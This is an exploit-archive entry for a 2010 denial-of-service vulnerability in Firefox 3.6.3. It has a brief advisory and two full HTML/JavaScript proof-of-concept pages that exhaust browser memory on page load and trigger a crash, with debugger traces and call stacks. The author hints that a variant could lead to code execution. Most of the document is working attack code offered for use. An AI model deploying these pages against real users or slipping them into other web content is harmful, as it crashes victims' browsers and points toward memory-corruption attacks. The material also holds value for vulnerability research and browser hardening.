Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities

2010-05-21T00:00:00
ID 1337DAY-ID-12329
Type zdt
Reporter x90c
Modified 2010-05-21T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            =================================================================
Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
=================================================================


Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
 
0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed.
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)
 
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
 
Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )
 
0x02. Proof of Concepts:
 
[PoC #1 - firefox_3.6.3_dos_poc_1.htm] --
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
 
// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #1
//
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// 7c7e2af5 ff1510157d7c    call    dword ptr [kernel32!_imp__RtlRaiseException (7c7d1510)]
//                                  ds:0023:7c7d1510={ntdll!RtlRaiseException (7c93e528)} ( raised )
//
// ##### 100% same below crash. exception raised. #####
// (f34.850): C++ EH exception - code e06d7363 (first chance)
// (f34.850): C++ EH exception - code e06d7363 (!!! second chance !!!)
// eax=0012aa58 ebx=01000121 ecx=00000000 edx=781d7ba8 esi=0012aae0 edi=2f900008
// eip=7c7e2afb esp=0012aa54 ebp=0012aaa8 iopl=0         nv up ei pl nz na pe nc
// cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
// kernel32!RaiseException+0x53:
// 7c7e2afb 5e              pop     esi
// --
//
// Call Stack:
// 00 0012aa28 7815c54b e06d7363 00000001 00000003 kernel32!RaiseException+0x53
// WARNING: Stack unwind information not available. Following frames may be wrong.
// 01 0012aa60 78164f33 0012aa70 781caa24 781ac11c MOZCRT19!CxxThrowException+0x46
// 02 0012aa78 100cd464 08c00060 0012b1a0 21500008 MOZCRT19!operator new+0x73
// 03 00000000 00000000 00000000 00000000 00000000 xul!gfxWindowsFontGroup::MakeTextRun+0x54
 
// Trace:
// MOZCRT19!operator new:
//    78164ec0 8b442404        mov     eax,dword ptr [esp+4]
//    78164ec4 83ec0c          sub     esp,0Ch
//    78164ec7 50              push    eax
//    78164ec8 e8134bfdff      call    MOZCRT19!malloc (781399e0)
//  ...
//    78164f26 c74424081cc11a78 mov     dword ptr [esp+8],offset MOZCRT19!exception::`vftable'+0xc14 (781ac11c)
//    78164f2e e8d275ffff      call    MOZCRT19!CxxThrowException (7815c505)    ; Throw Exception.
//    78164f33 83c40c          add     esp,0Ch
//    78164f36 c3              ret
//
// MOZCRT19!CxxThrowException:
//    7815c505 55              push    ebp
//    7815c506 8bec            mov     ebp,esp
//    7815c508 83ec20          sub     esp,20h
//  ...
//    7815c545 ff15e4911a78    call    dword ptr [MOZCRT19!modf+0x87d4 (781a91e4)] ds:0023:781a91e4=
//              {kernel32!RaiseException (7c7e2aa9)} ; Raise Exception!
//
// o Impact: DoS ( Exception Raise )
//
// o Tested on:
//      - MS Win XP SP3 (ko)
//      - Mozilla Firefox 3.6.3 (Win32) (ko)
//        ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's patched on Firefox 3.6
//      so this is *not the same vulnerability*!
//
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin Rad Pop.
//     - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovered date: 2010.03.04
// o Personal homepage: http://www.x90c.org
//
// Greets to Xpl017Elz(x82), rebel
//
 
function append_text_into_body()
{
    var p1 = document.getElementById('p1');
    var Text1 = "";
    var TextNode = null;
 
    // Trigger! MakeFont... into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }
 
    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);   // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
 
var arr1, arr2, arr3, arr4, arr5;
var a = 1;
 
var timer;
 
function fill_all_memory()
{
    var chunk = unescape("%u4141%u4141");
    var i = 0;
 
    if( a > 5 )
    {
        a++;
    }
    if(a >= 30)
    {
        append_text_into_body();
    }
 
    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);
 
    if(a == 1)
    {
        arr1 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr1[i] = chunk;
        }
        a = 2;
    }
    else if(a == 2)
    {
        arr2 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr2[i] = chunk;
        }
        a = 3;
    }
    else if(a == 3)
    {
        arr3 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr3[i] = chunk;
        }
        a = 4;
    }
    else if(a == 4)
    {
        arr4 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr4[i] = chunk;
        }
        a = 5;
    }
    else if(a == 5)
    {
        arr5 = new Array();
        for(i = 0; i < 0xd0; i++)
        {
            arr5[i] = chunk;
        }
        a = 6;
    }
}
 
function try_fill()
{
    fill_all_memory();
    setTimeout("try_fill();", 500);
}
 
</SCRIPT>
</HEAD>
 
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>
 
<!-- [ eoc ] -->
 
 
[PoC #2 - firefox_3.6.3_dos_poc_2.htm] --
 
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
 
// Mozilla Firefox <= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #2
//
// o Summary:
// After loading this PoC, about 40 seconds later triggered.
// Crashes are occured at a same location.
//
// --
// #####  almost 99% below crash #####
// (f0c.8b4): Access violation - code c0000005 (first chance)
// First chance exceptions are reported before any exception handling.
// This exception may be expected and handled.
// eax=0012aab8 ebx=00002226 ecx=000042a4 edx=000000ee esi=00003ce8 edi=000000ee
// eip=73f937cd esp=0012a3fc ebp=0012a3fc iopl=0         nv up ei pl zr na pe nc
// cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
// USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=???? ( beside stack area and unmapped )
// --
//
// 0:000> kp
// ChildEBP RetAddr 
// 0012a3fc 73f99a42 USP10!DoubleWideCharMappedString::operator[]+0x1f
// 0012a4cc 73f92d34 USP10!ScriptTokenize+0x91
// 0012a4f4 100efc30 USP10!ScriptItemize+0x42
// WARNING: Stack unwind information not available. Following frames may be wrong.
// 0012a5a0 7813807d xul!gfxWindowsFontGroup::GetUnderlineOffset+0x4cb0
// 00000000 00000000 MOZCRT19!expand+0x37d
//
// o Impact: DoS ( may also code execution )
//
// o Tested on:
//      - MS Win XP SP3 (ko)
//      - Mozilla Firefox 3.6.3 (Win32) (ko)
//        ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )
//
// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's patched on Firefox 3.6
//      so this is *not the same vulnerability*! and this makes same crash with [2]
//
// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin Rad Pop.
//     - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
//
// [2] All browsers 0day Crash Exploit ( Inj3ct0r Team )
//     - http://www.exploit-db.com/exploits/12491
//
// o Discovered by x90c in INetCop(c) Security during analysis.
// o Discovery date: 2010.03.04
// o Personal homepage: http://www.x90c.org
//
// Greets to Xpl017Elz(x82), rebel
//
 
function append_text_into_body()
{
    var p1 = document.getElementById('p1');
    var Text1 = "";
    var TextNode = null;
 
    // Trigger! MakeFont... into p element on body element.
    for(var i = 0; i < 0x700000 / 4; i++)
    {
        Text1 = Text1 + "AAAA";
    }
 
    TextNode = document.createTextNode(Text1);
    p1.appendChild(TextNode);   // Memory Exhaustion makes FireFox can't make Texts it caused an crash.
}
 
var a = 1;
 
var timer;
 
function fill_all_memory()  // This function's variation can makes an null pointer deref without append_text_into_body() calling.
{
    var chunk = unescape("%u4141%u4242");
    var i = 0;
 
    append_text_into_body();
 
    while(chunk.length <= 0x400000)
    {
        chunk = chunk + chunk;
    }
    chunk = chunk + chunk + chunk;
    chunk = chunk.substring(0, chunk.length);
}
 
function try_fill()
{
    fill_all_memory();
    // this poc makes 99% almost crashed same location as below.
    // 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
    //     73f937cd 0fb70448        movzx   eax,word ptr [eax+ecx*2] ds:0023:00133000=????
    // 100: ''
    // 150: ''
    // 200: ''
    // 300: ''
    // 500: ''
    // 1000: ''
    // 5000: ''
    setTimeout("try_fill();", 10);
}
 
</SCRIPT>
</HEAD>
 
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
 
</HTML>
 
<!-- [ eoc ] -->



#  0day.today [2018-03-20]  #